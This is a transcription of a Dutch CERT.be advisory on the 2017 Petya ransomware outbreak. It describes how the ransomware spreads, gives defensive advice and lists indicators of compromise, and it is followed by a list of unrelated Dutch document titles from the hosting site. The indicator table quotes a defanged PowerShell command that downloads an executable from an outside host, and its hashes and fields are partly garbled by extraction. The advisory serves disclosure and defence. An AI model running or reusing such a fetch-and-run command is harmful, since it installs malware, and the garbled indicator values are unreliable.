Petya ransomware aanval
|
|
- Sterre de Coninck
- 6 jaren geleden
- Aantal bezoeken:
Transcriptie
1 Petya ransomware aanval Intieel Rapport TLP: [WHITE]
2 Inhoud 1 Samenvatting Advies IOC s... 5 Petya ransomware aanval - 27 June TLP: [WHITE] 2
3 1 SAMENVATTING DREIGING SLACHTOFFERS DADERS HOOG wereldwijd bedrijven + onbekend individuen CERT.be ontving informatie via betrouwbare partners dat de Oekraïnische overheid, Russische bedrijven en een containerterminal bedrijf uit Denemarken onder aanval lagen van een nieuwe ransomware aanval. Kort nadien werd de slachtofferlijst aangevuld met bedrijven uit Nederland, Spanje, Frankrijk, Groot-Britanië en België. Het lijkt te gaan over een nieuwe variant van de Petya ransomware die zich (intern) lijkt te verspreiden via de EternalBlue/DoublePulsar exploit 1 voor SMB die vorige maand furore maakte via de ransomware Wannacry. Eenmaal het systeem geïnfecteerd is, verspreidt de ransomware zich verder via een interne Windows toolkit (WMIC) en via een externe beheertool PsExec. De initiële aanvalvector is momenteel onbekend, maar het wordt geopperd dat het zich zou verspreiden via een excel document met een valse Windows signature 2 (LokiBot 3 ). Eenmaal het systeem geïnfecteerd is met de ransomware, probeert het de harde schijf te encrypteren door gebruik te maken van beheerdersrechten. Indien deze niet voorhanden zijn, gebruikt het een kernel exploit, injecteert het zichtzelf in de MBR 4 van de harde schijf en maakt het een scheduled task aan die een herstart uitvoert na één uur. Bij het heropstarten van het systeem laadt de ransomware zich in het geheugen en begint de encryptie. Er is geen killswitch aanwezig en de ransomware communiceert niet met C2 servers 5. Volgende extensies worden geëncrypteerd: ".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd. kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.v di.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip" Na de encryptie krijgt de gebruiker een scherm te zien met volgende boodschap: Huidige informatie wijst erop dat systemen die gepatcht zijn met de wanacry-patch, toch kwetsbaar zijn voor deze ransomware. Momenteel hebben we weet van infecties op Windows XP, 7 en 10 van verschillende patchniveaus Petya ransomware aanval - 27 June TLP: [WHITE] 3
4 2 ADVIES Niet betalen! Het adres is niet langer actief; Patch systemen (in het bijzonder MS17-010); Voorkom Local Administrator rechten voor gewone gebruiker; Zoek naar volgende scheduled task en verwijder: o C:\Windows\system32\shutdown.exe /r /f Houd AV/IDS/IPS up-to-date; Voorzie een Backup strategie; Traditionele beschermingsstrategiën tegen Ransomware Petya ransomware aanval - 27 June TLP: [WHITE] 4
5 3 IOC S Category Type Value url External link 0d b30f6b0d7d3a745// md5 415fe69bf32634ca98fa07633f4118e1 External url b30f6b0d7d3a745?environmentId=100 Order doc External url fe2e5d0543b4c8769e401ec216d78a5a3547dfd426fd47e097df04a5f7d6d 206 External vulnerability CVE sha1 101cc1cb56c407d5b9149f2c3b d23ba84 url url sha a0b5ee4b95ddad634dd225dc0f73 md a4daf8eb9660f1c67e30f8b25 Network ip-dst mshta.exe ee29b9c01318a1e23836b949942db14d fdae2f41df9f0dcd922c63 bc6 myguy.xls Network url h11p:// /myguy.xls Network ip-dst PID: 2588, Additional Context: ( System.Net.WebClient).DownloadFile('h11p://frenchcooking.com/myguy.exe', '%APPDATA%\10807.exe') ;) exe %APPDATA%\10807.exe %APPDATA%\10807.exe' md5 a1d5895f85751dfe67d19cccb51b051a Petya ransomware aanval - 27 June TLP: [WHITE] 5
6 Network External Analysis domain coffeinoffice.xyz PID: 3096)File Name BCA9D6.exeMD5 Hash Identifier A1D5895F85751DFE67D19CCCB51B051ASHA-1 Hash Identifier 9288FB8E96D419586FC8C595DD95353D48E8A060SHA-256 Hash Identifier 17DACEDB6F0379A65160D73C0AE3AA1F03465AE75CB6AE754C7DCB301 7AF1FBDFile Size bytesconnects to the host: COFFEINOFFICE.XYZ 80Pay attention - the trojan on which I give the markers could potentially be used to load the encryption part %APPDATA%\10807.exe sha1 url Sha1 Filepath powershell.exe 9288fb8e96d419586fc8c595dd95353d48e8a060 System.Net.WebClient).DownloadFile('h11p://frenchcooking.com/myguy.exe exe %WINDIR%\System32\mshta.exe C:\myguy.xls.hta BCA9D6.exe 17dacedb6f0379a65160d73c0ae3aa1f03465ae75cb6ae754c7dcb3017af1f bd cc450ef5f8c5f ec1fed91f694e0d b30f6b0d7d3a f917aaba5684fbe56d3c57d48ef2a1aa7cf06d 64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94 b1 752e5cf9e47509ce51382c88fc4d7e53b5ca44ba22a94063f b362 ca5 dllhost.dat wowsmith123456@posteo.net Petya ransomware aanval - 27 June TLP: [WHITE] 6
Het is voorlopig nog onduidelijk wie achter deze aanvallen zit en wat de initiële infectievector is.
WannaCry TLP: Green 1 CONTEXT Op vrijdag 12/05/2017 is een besmetting met een variant van het WannaCrypt (of Wanna/WaCry) vastgesteld bij verschillende grote bedrijven in Spanje. Kort daarna heeft dezelfde
Nadere informatieHet is voorlopig nog onduidelijk wie achter deze aanvallen zit en wat de initiële infectievector is.
WannaCry TLP: WHITE 1 CONTEXT Op vrijdag 12/05/2017 is een besmetting met een variant van het WannaCrypt (f Wanna/WaCry) vastgesteld bij verschillende grte bedrijven in Spanje. Krt daarna heeft dezelfde
Nadere informatieGratis bescherming tegen zero-days exploits
Gratis tegen zero-days exploits We zien de laatste jaren een duidelijke toename van geavanceerde dreigingen op onze computersystemen. In plaats van het sturen van alleen e-mails met geïnfecteerde bijlagen
Nadere informatieInsecurities within automatic update systems
Can patching let a cracker in?. Peter Ruissen Robert Vloothuis RP2 Project OS3 System and Network Engineering University of Amsterdam June 28, 2007 1 2 3 4 Linux distributies Java Runtime Environment Mozilla
Nadere informatie1 Ransomware Preventie Slachtoffer van ransomware?... 8
Inhoud 1 Ransomware... 3 Introductie... 3 Ransomware: een stijgende dreiging... 4 Wat is het losgeld dat gevraagd wordt bij ransomware?... 4 Hoe wordt een informaticasysteem geïnfecteerd... 5 Hoe gebeurt
Nadere informatiePetya/NotPetya Malware
Petya/NtPetya Malware Rapprt ver de wereldwijde infectie 30 Juni 2017 TLP: [WHITE] Inhud 1 Executive Summary...3 2 Technische Samenvatting...4 2.1 Karakteristieken... 4 2.2 Verspreiding... 5 2.3 Na infectie...
Nadere informatieDIGIPASS Native Bridge wordt niet gedetecteerd wanneer de DIGIPASS 870 bekabeld gebruikt wordt.
KB 120223 DIGIPASS Native Bridge wordt niet gedetecteerd wanneer de DIGIPASS 870 bekabeld gebruikt wordt. Creation date: 05/07/2016 Last Review: 5/07/2016 Revision number: 1 Document type: FAQ Security
Nadere informatieRansomware is here to stay: bescherm jezelf
Ransomware is here to stay: bescherm jezelf. Date: Juli 2017 Version: 1.0 Wat is ransomware nu eigenlijk en waarom kan het zo gevaarlijk zijn? In dit artikel geven we uitleg wat het is, wat wij doen om
Nadere informatieVoor op afstand os installatie moeten de volgende onderdelen geïnstalleerd zijn op de Windows 2000 server.
Werkstuk door een scholier 1063 woorden 13 januari 2006 6,8 51 keer beoordeeld Vak Informatica Risimage Hoe werkt RIS? RIS gebruikt DHCP en de Active Directory service om cliënt van afstand te installeren.
Nadere informatieDe Security System Integrator Het wapen tegen onbekende dreigingen
De Security System Integrator Het wapen tegen onbekende dreigingen De Business Case 9/16/2015 2 De Cyberaanval Een tastbaar probleem Strategische Impact Merkwaarde Inkomstenderving Intellectueel eigendom
Nadere informatieLabo-sessie: Gegevensbeveiliging
Labo-sessie: Gegevensbeveiliging 1 Inleiding Dit labo zal devolgende topics behandelen: eid card Opdracht 1: Digitaal signeren van een MS Office document (zie pagina: 5) Opdracht 2: Digitaal signeren van
Nadere informatieWat te doen tegen ransomware
Wat te doen tegen ransomware DATA Dennis Switzer Senior Consultant PwC Edgar Versteeg Commercieel Product Manager KPN Security Services Ransomware Trends en ontwikkelingen BC/DR Malware die systemen en
Nadere informatie2 Inleiding Server 2012 ii.2 VMware installeren en gereedmaken
Week Datum Les nr Onderwerp 35 24-8-2015 1 Inleiding en basisbegrippen netwerk / IP i.1 Opbouw van de lessen: Lessen van het boek & Tussentijdse beoordelingsmomenten met theorietoets en eindopdracht i.2
Nadere informatieUpgrade EEPC 7.0.2 naar Drive Encryption 7.1
Upgrade EEPC 7.0.2 naar Drive Encryption 7.1 Inhoud 1 Kenmerken... 3 1.1 Hardware eisen... 3 1.2 Software eisen... 3 2 Upgrade-paden... 4 2.1 De stappen in het kort... 4 3 Start... 5 3.1 Upgrade de EEAdmin
Nadere informatieInstallatie Procedure Femap STAND ALONE & FLOATING LICENTIE
Installatie Procedure Femap STAND ALONE & FLOATING LICENTIE Mocht u niet weten wat voor type licentie u heeft, neem dan contact met ons op voordat u aan de installatie begint. Deze handleiding kan ook
Nadere informatiePO1168 EnVivoUSB netwerk hub 1. Ik kan de aangesloten USB apparaten in mijn netwerk niet gebruiken
PO1168 EnVivoUSB netwerk hub 1. Ik kan de aangesloten USB apparaten in mijn netwerk niet gebruiken envivo@teknihall.nl NL : 0900/400 2001 p.1 In het venster van de applicatie wordt gemeld dat de toestellen
Nadere informatieMaak een image file van je harddisk
1 van 5 17/03/2006 17:20 Maak een image file van je harddisk Norton Ghost 1. Een backup aanmaken met ghost 2. Terug zetten van een backup met ghost Ghost is een programma van Symantec waarmee u op een
Nadere informatieCriminaliteit op internet: Ransomware
Criminaliteit op internet: Ransomware Kwaadaardige software blokkeert PC's van eindgebruikers en lijkt afkomstig van Ecops, FCCU of een andere buitenlandse politiedienst Sinds enkele maanden blijken steeds
Nadere informatieDatum 15 juni 2006 Versie 1.0.6. Exchange Online. Handleiding voor gebruiker Release 1.0
Datum 1.0.6 Exchange Online Handleiding voor gebruiker Release 1.0 1.0.6 Inhoudsopgave 1 Instellingen e-mail clients 2 1.1 Gebruik via Outlook 2003 2 1.2 Gebruik via ActiveSync 15 1.3 Gebruik via andere
Nadere informatieKwaadaardige software blokkeert PC s van eindgebruikers en lijkt afkomstig van Ecops, FCCU of een andere buitenlandse politiedienst
Disclaimer Kwaadaardige software blokkeert PC s van eindgebruikers en lijkt afkomstig van Ecops, FCCU of een andere buitenlandse politiedienst Sinds enkele dagen blijken steeds meer mensen slachtoffer
Nadere informatieSolcon Online Backup. Aan de slag handleiding voor Linux
Version 1 September 2007 Installatie: 1. Download het setup bestand (obm-nix.tar.gz) van de website. 2. Voor de volgende stappen dient u root te zijn. 3. Doorloop de volgende stappen voor het uitpakken
Nadere informatieNIEUWSFLASH 20-06- 12
NIEUWSFLASH 20-06- 12 NR 44-B Voor KAMMENSTRAAT en OMGEVING (Kammenstraat-Hondsberg-Hemelrijkweg-Lazaret-Schuurblok-Kloosterstraat-Grensstraat-Handelsstraat-Hemelrijklaan- Statievelden) Noodnummer: 101
Nadere informatieLes 2, do 29-01- 15: Inleiding Server 2012 ii.2 VMware installeren en gereedmaken
Week 5: Les 1, do 2901 15: Inleiding en basisbegrippen netwerk / IP i.1 Opbouw van de lessen Lessen van het boek Tussentijdse beoordelingsmomenten met theorietoets en eindopdracht i.2 Netwerkbegrippen
Nadere informatieLesplan: Schooljaar 2014-2015 versie: 1.0. HICMBO4P MS Server 2012 Planning
Week 5: Les 1, do 2901 15: Inleiding en basisbegrippen netwerk / IP i.1 Opbouw van de lessen Lessen van het boek Tussentijdse beoordelingsmomenten met theorietoets en eindopdracht i.2 Netwerkbegrippen
Nadere informatieMulti user Setup. Firebird database op een windows (server)
Multi user Setup Firebird database op een windows (server) Inhoudsopgave osfinancials multi user setup...3 Installeeren van de firebird database...3 Testing van de connectie met FlameRobin...5 Instellen
Nadere informatieIntroductie Veiligheidseisen Exploiten Conclusie. Browser security. Wouter van Dongen. RP1 Project OS3 System and Network Engineering
Browser security Wouter van Dongen RP1 Project OS3 System and Network Engineering Februari 4, 2009 1 Introductie Onderzoeksvraag Situatie van de meest populaire browsers Client-side browser assets vs.
Nadere informatieSymantec Backup Exec System Recovery to VMware ESX Machine
1 Symantec Backup Exec System Recovery to VMware ESX Machine How to.. 2 Inhoud: Symantec Backup Exec System Recovery to VMware ESX Machine... 1 Backup Exec Livestate to VMware:... 3 Doel stelling:... 3
Nadere informatieMULTIFUNCTIONELE DIGITALE SYSTEMEN. Aanmaken van Templates voor Re-Rite
MULTIFUNCTIONELE DIGITALE SYSTEMEN Aanmaken van Templates voor Re-Rite Templates aanmaken tbv Re-Rite Aanmaken van Templates gaat het eenvoudigst via het webbased beheerprogramma van de e-studio; TopAccess.
Nadere informatieLes 3, di 25-08- 15: De Installatie van Windows Server 2012 1.1 Windows Server 2012 1.2 De installatie van Windows Server 2012
Week 35: Les 1, ma 24-08- 15: Inleiding en basisbegrippen netwerk / IP i.1 Opbouw van de lessen Lessen van het boek Tussentijdse beoordelingsmomenten met theorietoets en eindopdracht i.2 Netwerkbegrippen
Nadere informatieLes 2, ma 26-01- 15: Inleiding Server 2012 ii.2 VMware installeren en gereedmaken
Week 5: Les 1, ma 2601 15: Inleiding en basisbegrippen netwerk / IP i.1 Opbouw van de lessen Lessen van het boek Tussentijdse beoordelingsmomenten met theorietoets en eindopdracht i.2 Netwerkbegrippen
Nadere informatieMacrium Reflect V4.2 Handleiding
Macrium Reflect V4.2 Handleiding Met Macrium Reflect kunt u een Image (kopie) maken van de C: schijf, waarmee, u na computerproblemen binnen tien minuten weer een goed werkende PC kunt hebben. Ga naar:
Nadere informatieSecurity Les 1 Leerling: Marno Brink Klas: 41B Docent: Meneer Vagevuur
Security Les 1 Leerling: Klas: Docent: Marno Brink 41B Meneer Vagevuur Voorwoord: In dit document gaan we beginnen met de eerste security les we moeten via http://www.politiebronnen.nl moeten we de IP
Nadere informatieInternetbedreigingen in 2003
De belangrijkste trends in 2003 Internetbedreigingen in 2003 Kwetsbaarheden* Het aantal kwetsbaarheden stijgt. De tijd tussen het ontdekken van kwetsbaarheden en het uitbreken van een aanval wordt steeds
Nadere informatieMeldingen 2010-2014. Cijfers over meldingen aan CERT.be
Meldingen 2010-2014 Cijfers over meldingen aan CERT.be OVERZICHT 2010 2014 1.1 Gemiddeld aantal meldingen en incidenten per maand: 12000 10000 8000 6000 4000 Meldingen/jaar Incidenten/jaar 2000 0 2010
Nadere informatieInhoudsopgave. GlinQ: BattleField2 beheertool, Handleiding versie 1.0
Inhoudsopgave Inleiding... 2 Key features... 2 Suggesties... 2 Inlog venster:... 3... 3... 3 General... 4... 4... 4 Advanced:... 5... 5... 5 Maplist:... 6... 6... 6 Players:... 7... 7... 7 Banlist:...
Nadere informatie2 Inleiding Server 2012 Donderdag 4 Februari 2016 ii.2 VMware installeren en gereedmaken
Les nr Onderwerp Datum 1 Inleiding en basisbegrippen netwerk / IP Maandag 1 Februari 2016 i.1 Opbouw van de lessen: Lessen van het boek & Tussentijdse beoordelingsmomenten met theorietoets en eindopdracht
Nadere informatieJe website veilig de zomer(vakantie) door
Je website veilig de zomer(vakantie) door Best veel ellende op het internet Hoe hou je je website veilig Zorg dat je eigen computer virusvrij is (de meeste besmettingen van websites ontstaan via de eigen
Nadere informatieWindows server 2012. Wesley de Marie. Wesley
Windows server 2012 Wesley Windows server 2012 Naam: Klas: MICNIO2B Leerjaar: Leerjaar 1/2 Inhoud Installeren van windows server 2012... 3 Naam wijzigen... 4 IPV6 uitschakelen... 5 IP toewijzen aan je
Nadere informatieCriminaliteit op internet: Ransomware
Pz Grens, Patrick De Smedt Van: Vleugels Sven [sven.vleugels@pzgrens.be] Verzonden: woensdag 20 juni 2012 13:47 Aan: niet-openbare ontvangers: Onderwerp: BIN Flash : Herinnering : Ransomware virus blijft
Nadere informatieHOWTO: Microsoft Domain Controller en Linux DNS-server. geschreven door Johan Huysmans
HOWTO: Microsoft Domain Controller en Linux DNS-server geschreven door Johan Huysmans 1. Over deze howto. Deze howto behandelt verschillende aspecten van een MS Windows Domain Controller gebruik makend
Nadere informatieHandleiding FTP. Uitleg over het aanpassen van de website uit het basispakket, met het programma FileZilla
Handleiding FTP Uitleg over het aanpassen van de website uit het basispakket, met het programma FileZilla Inhoud Downloaden van FileZilla...2 Installatie en eerste gebruik van FileZilla...3 Installatie...3
Nadere informatieVergeten wachtwoord in Windows 10
Frank Biesmans - syntra@frankbiesmans.be Vergeten wachtwoord in Windows 10 Syntra Limburg - Campus Genk Kerkstraat 1-3600 GENK Tel: +32 89354616 - Fax; +32 89353042 E-Mail: infogenk@syntralimburg.be Inleiding
Nadere informatieLOOPBAAN. Presentatie voor de loopbaanoriëntatiedag van de Leidsche Flesch Sander Kievit
LOOPBAAN Presentatie voor de loopbaanoriëntatiedag van de Leidsche Flesch Sander Kievit WIE BEN IK EN WAT HEB IK GEDAAN? Sander de Kievit Sinds 2010: TNO Functie: onderzoeker / consultant Vakgebied: Informatiebeveiliging
Nadere informatieStandard Parts Installatie Solid Edge ST3
Hamersveldseweg 65-1b 3833 GL LEUSDEN 033-457 33 22 033-457 33 25 info@caap.nl www.caap.nl Bank (Rabo): 10.54.52.173 KvK Utrecht: 32075127 BTW: 8081.46.543.B.01 Standard Parts Installatie Solid Edge ST3
Nadere informatieHOE RANSOMWARE JOUW ORGANISATIE KAN GIJZELEN. Ransomware aanvallen en hoe deze worden uitgevoerd
HOE RANSOMWARE JOUW ORGANISATIE KAN GIJZELEN Ransomware aanvallen en hoe deze worden uitgevoerd Ransomware is een vorm van malware die bij gebruikers de toegang tot gegevens of systemen blokkeert totdat
Nadere informatieNetwerkbeveiliging. Sven Sanders
1 Netwerkbeveiliging Sven Sanders 2 Gastles 19/4 Peter Van Hemlryck Fortinet Fortigate firewall + praktische voorbeelden Opdracht: 3 lessons learned Wat vind je belangrijk/relevant om te onthouden Wat
Nadere informatieSECURITY UITDAGINGEN 2015
SECURITY UITDAGINGEN 2015 Hoe uw IT-infrastructuur beschermen? Robby Cauwerts Security Engineer 2015 Check Point Software Technologies Ltd. 1 CHECK POINT NAMED A LEADER IN THE GARTNER MAGIC QUADRANTS FOR
Nadere informatieBackup Connect installatie van de Client software.
Backup Connect installatie van de Client software. Let s Connect, 2011 Backup Connect [Installatie handleiding] - Nederlands Page 1 Beste klant, gefeliciteert met de huur van uw Backup Connect Cloud product!
Nadere informatieBestandssystemen. yvan vander sanden. 16 maart 2015
Bestandssystemen yvan vander sanden 16 maart 2015 Bij elk operating system is het belangrijk te begrijpen hoe schijven en bestandssystemen werken. Schijven moeten geformatteerd worden met een specifiek
Nadere informatieClausule verhoor ransomware
Clausule verhoor ransomware Heden bied ik me aan bij jullie diensten teneinde een blokkering van mijn gegevens/informaticasysteem aan te geven. Algemene gegevens Om welke besmet informaticasysteem gaat
Nadere informatieWAVIX Installatie Handleiding
Modelit Rotterdamse Rijweg 126 3042 AS Rotterdam Telefoon +31 10 4623621 info@modelit.nl www.modelit.nl in opdracht van RIKZ WAVIX Installatie Handleiding Modelit KvK Rotterdam 24290229 Datum 27 September
Nadere informatieMS Exchange instellingen
MS Exchange instellingen Dit document omschrijft een aantal instellingen welke in geval van problemen bij verzenden van e-mail vanaf een Toshiba e-studio MFP, in MS Exchange gewijzigd kunnen worden. Het
Nadere informatieAanmaken van een NBB-certificaat
Aanmaken van een NBB-certificaat Hoe een certificaat van de Nationale Bank van België (NBB) genereren, hernieuwen (renewal) of opnieuw genereren (recovery)? 1 Inhoudstafel 1. DOEL VAN DEZE HANDLEIDING...
Nadere informatieStappen om EduVPN te activeren:
EduVPN onder Ubuntu 16.04 Helaas is de network manager van Ubuntu 16.04 niet in staat met de ovpn file van eduvpn om te gaan. Ook is de standaard openvpn die Ubuntu uitlevert niet de laatste versie. Stappen
Nadere informatieKPDdoc kerneigenschappen
KPDdoc kerneigenschappen Gestructureerd & begeleid aanmaken van electronische informatie Bv. Verslag vergadering in MS Word Workflow Capteren van bestaande informatie Bv. Inkomende emails en post Beveiligd
Nadere informatieTechnical Note #047 Auteur:Mark Vork Gemaakt op:14 februari 2003 Gewijzigd op:9 februari 2004
Technical Note #047 Auteur:Mark Vork Gemaakt op:14 februari 2003 Gewijzigd op:9 februari 2004 Een IPsec tunnel opzetten met een Netasq door middel van een Safenet client Met behulp van deze technical note
Nadere informatieBelgoVault Backup Partner installatie van de Client software.
BelgoVault Backup Partner installatie van de Client software. Cloud Partners, 2011 Backup Partner [Installatie handleiding] - nederlands Page 1 Beste klant, Beste partner, gefeliciteert met de huur van
Nadere informatieBackup Connect installatie van de Client software
Backup Connect installatie van de Client software Connectingpeople Pro, 2012 BackupConnect Installatie handleiding 1/10 Beste klant, Gefeliciteerd met de huur van uw Backup Connect Cloud product! U bent
Nadere informatieVraag : Antwoord : Meer Infos.pdf. Wat zijn de minimum systeemeisen voor Bouwsoft?
Vraag : Wat zijn de minimum systeemeisen voor Bouwsoft? Antwoord : Systeemvereisten lokale pc of netwerk / Verdere technische info bouwsoft.eu 1. Pc met pentium III 1000Mhz - 512MB RAM (1GB igv Vista)-
Nadere informatieHANDLEIDING ENTERPRISE DRIVE. Laatst bijgewerkt: January 18, 2016
HANDLEIDING ENTERPRISE DRIVE Laatst bijgewerkt: January 18, 2016 Inhoudsopgave 1 Enterprise Drive installeren...3 2 Enterprise Drive voor de eerste maal opstarten...3 3 Deelnemen aan Spaces (Een uitnodiging
Nadere informatieUBUNTU 8 installatie. 13/10/2009 http://www.ivowebschool.be/uploads/ ivowebschool.be/ /205bc10d-ef8e-4a 1/14. Onderwerpen
UBUNTU 8 installatie Onderwerpen Ubuntu downloaden VMWare klaarmaken Ubuntu installeren VMWare tools installeren 1. Ubuntu downloaden ( ) Je kan ubuntu gratis downloaden via de website www.ubuntu.com.
Nadere informatieAHSAY OBM QUICK START GUIDE
AHSAY OBM QUICK START GUIDE Contents AHSAY OBM QUICK START GUIDE... 2 ALGEMENE INSTELLINGEN... 2 RECHTEN INSTELLEN... 2 BACKUP VAN NETWERKSCHIJVEN... 4 INSTELLEN VAN DE IN-FILE DELTA... 6 DE ENCRYPTIESLEUTEL...
Nadere informatieHOW TO RESTORE A SYSTEM IMAGE IN WINDOWS SERVER 2012
HOW TO RESTORE A SYSTEM IMAGE IN WINDOWS SERVER 2012 Contents WINDOWS SERVER 2012 BUILT-IN BACKUP APPLICATION TO RESTORE A SYSTEM IMAGE.... 2 RESTORE OPTIONS IN WINDOWS SERVER BACKUP... 2 SYSTEM RECOVERY
Nadere informatieDit document beschrijft belangrijke aandachtspunten voor de installatie van Deep Defender. Ook omschrijft dit document hoe de beheerder kan omgaan
Dit document beschrijft belangrijke aandachtspunten voor de installatie van Deep Defender. Ook omschrijft dit document hoe de beheerder kan omgaan met Threat meldingen, driver problemen en hoe het product
Nadere informatieCOMPUTERONDERHOUD. Pagina 1 van 9
COMPUTERONDERHOUD Een aangename PC om mee te werken is een PC die goed onderhouden is. Het onderhoud van een PC is op zich niet moeilijk en kan je stap voor stap uitvoeren. Voor dat je begint aan het onderhoud
Nadere informatieInstallatie Handleiding Alimentatie Rekendisk. 2011 Sdu Uitgeverij / A. Koppenaal
Installatie Handleiding Alimentatie Rekendisk / A. Koppenaal I Installatie Handleiding Alimentatie Rekendisk Inhoudsopgave A Inleiding 1 B Installatie 2 C Troubleshoot 4 1 Melding:... Kan database niet
Nadere informatie2 Installatie Windows Server 2008 R2 Standard
10 2 Installatie Windows Server 2008 R2 Standard 2.1 Mogelijke proefopstellingen 2.1.1 64-bit computer, zonder Virtualization Technology Minimaal 2GB geheugen Netwerkkaart Naar Internet, waarschijnlijk
Nadere informatiePRIJSLIJST EINDKLANTEN DOMEINNAMEN EN SHARED WEBHOSTING
PRIJSLIJST EINDKLANTEN DOMEINNAMEN EN SHARED WEBHOSTING Extensie Land Looptijd Excl. p/j Incl. p/j.be België 1 jaar 15,00 18,15.biz Internationaal 1 jaar 15,00 18,15.co.uk* Groot-Brittannië 2 jaar 15,00
Nadere informatiePagina 1. Installatiehandleiding vanaf versie 2017
Pagina 1 Installatiehandleiding vanaf versie 2017 Inhoudsopgave Update stand alone DATAflor BUSINESS (single user)... 3 Update server DATAflor BUSINESS... 6 Update client DATAflor BUSINESS (na server update)...
Nadere informatieResultaten van de scan. Open poorten. High vulnerabilities. Medium vulnerabilites. Low vulnerabilities
De Nessus scan We hebben ervoor gekozen om de webserver met behulp van Nessus uitvoerig te testen. We hebben Nessus op de testserver laten draaien, maar deze server komt grotendeels overeen met de productieserver.
Nadere informatieQuickstart handleiding
Quickstart handleiding MS Outlook Account instellen Rechten geven offline werken www.pimbox.nl/support a hosted zarafa product Inhoudsopgave Installatie van de Zarafa Outlook Client 3 Aanmaken van een
Nadere informatieInstallatie Domein Windows 2000
Nodig : a. installatie van Windows 2000 server afgewerkt b. installatie van Windows 2000 Service Pack 4.0 afgewerkt c. toekennen Ip-adres aan de server afgewerkt Bij het heropstarten van de server krijgt
Nadere informatieSysteemeisen Exact Compact product update 406
1 van 6 08-10-2013 12:07 Exact Compact Systeemeisen Exact Compact product update 406 Een pressionele administratie moet bedrijfszeker zijn. U moet er in het dagelijks gebruik snel en zonder onderbrekingen
Nadere informatieDownload en installatie door de hoofdgebruiker
Download en installatie door de hoofdgebruiker Zodra het contract in orde is hebt u via DexiaWeb /DexiaSoft toegang tot een aantal functionaliteiten die het mogelijk maken om de software te downloaden,
Nadere informatieDUPLICATI (Bestand back-up)
DUPLICATI (Bestand back-up) Een erg compleet programma dat al jaren prima diensten bewijst is Duplicati. U kunt Dulplicati downloaden van de website duplicati.com van de makers. Versie 1.3.4 stamt uit
Nadere informatieInhoud 0 Inleiding 1 Algemene netwerkbegrippen De installatie van Windows Server 2003
vii Inhoud 0 Inleiding 1 0.1 In dit hoofdstuk 1 0.2 Dit boek 1 0.3 De taken van een netwerkbeheerder 3 0.4 Microsoft Windows-besturingssystemen 4 0.5 PoliForm bv 7 0.6 Dit boek doorwerken 8 0.7 De installatie
Nadere informatieDigitaal e-mail certificaat Ondertekenen en encryptie. De meest recente versie van dit document kunt u vinden op: www.ensbergen.nl
Digitaal e-mail certificaat Ondertekenen en encryptie De meest recente versie van dit document kunt u vinden op: www.ensbergen.nl Index 1 Inleiding... 4 1.1 Algemeen...4 1.2 Leeswijzer...4 2 Private key
Nadere informatieCloud2 Online Backup
Cloud2 Online Backup Tips configuratie AhsayOBM software Gebruikersrechten instellen: Zorg ervoor dat de gebruikersnaam en wachtwoord goed zijn ingevoerd, en dat het account voldoende rechten heeft op
Nadere informatieFerdiWeb Back-up. Installatie FerdiWeb Back-up
FerdiWeb Back-up Na aanmelding krijgt u van ons een e-mail met daarin een link naar het back-up programma, die u dient te installeren op de computer waarvan u een back-up wilt maken. Het wachtwoord wordt
Nadere informatie1-poorts USB Wireless N netwerkprintserver met 10/100 Mbps Ethernet-poort b/g/n
1-poorts USB Wireless N netwerkprintserver met 10/100 Mbps Ethernet-poort - 802.11 b/g/n Product ID: PM1115UWEU Met de PM1115UWEU Wireless-N printserver kunt u tegelijkertijd een standaard USB-printer
Nadere informatieInstalleer Apache2: Landstede februari 2009 versie 3 1 Bertil Hoentjen
Installeer Apache2: Deze howto gaat over name based virtual hosting onder Apache 2.x., en is getest onder OpenSUSE 11 maar is in feite ook van toepassing op de andere distributies. Alleen Debian en afgeleide
Nadere informatieSELinux (project 073)
Wat is SELinux? Het staat voor: Security Enhanced Linux Historie Het is een door de NSA en de Universiteit van Utah ontwikkelde beveiligings uitbreiding voor operating systemen. Het is door NSA opensource
Nadere informatieOm gebruik te maken van het draadloze netwerk Eduroam, zal het programma SecureW2 geïnstalleerd moeten worden.
1 Installatie van SecureW2 Om gebruik te maken van het draadloze netwerk Eduroam, zal het programma SecureW2 geïnstalleerd moeten worden. Het is natuurlijk mogelijk dat de Secure W2 Client reeds op uw
Nadere informatieVPN Remote Access Control
VPN VPN Setup In deze handleiding kunt u informatie vinden over alle mogelijke VPN instellingen van de DrayTek Vigor 2130 en 2750. Hierin zullen wij alle algemene instellingen bespreken die van toepassing
Nadere informatieGoedkope DSL aansluitingen hebben voor de bewaking op afstand een belangrijk nadeel:
Wereldwijd beelden beschikbaar Kosteloze service Goedkope DSL aansluitingen hebben voor de bewaking op afstand een belangrijk nadeel: Wisselende IP adressen. Alleen via een dynamische nameserver kunt u
Nadere informatieIndicators of Compromise
Indicators of Compromise Pas dreigingsinformatie effectief toe Factsheet FS-2016-02 versie 1.0 8 december 2016 Als u verantwoordelijk bent voor het veilig houden van het netwerk van uw organisatie, zult
Nadere informatieIntroduceert KASPERSKY ENDPOINT SECURITY FOR BUSINESS
Introduceert KASPERSKY ENDPOINT SECURITY FOR BUSINESS 1 Business strategieën en de impact voor de IT FLEXIBILITEIT Snel handelen met wendbaarheid en flexibiliteit Voor 66% van de organisaties staat flexibiliteit
Nadere informatieBewustwording Ransomware Virussen
L'Unité, het Franse woord voor eenheid, oftewel 'Eenheid in Automatisering' sinds 1991... Virussen L Unité Groep Nijverheidsweg 18 info@lunite.nl 035 75 11 900 1271 EA Huizen www.lunite.nl Inleiding Gezien
Nadere informatieTechnische nota AbiFire5 Rapporten maken via ODBC
Technische nota AbiFire5 Rapporten maken via ODBC Laatste revisie: 29 juli 2009 Inhoudsopgave Inleiding... 2 1 Installatie ODBC driver... 2 2 Systeeminstellingen in AbiFire5... 3 2.1 Aanmaken extern profiel...
Nadere informatieFAQ Veel gestelde vragen
FAQ Veel gestelde vragen Bladzijde 2 3 4 5 6 7 8 9 10-11 12 13 IP-adres van een PC vinden IP-adres van een PC instellen Openen van een telnet verbinding Openen van een telnet via WinWatt IP-adres van een
Nadere informatieInstallatie Handleiding Extra Werkstation
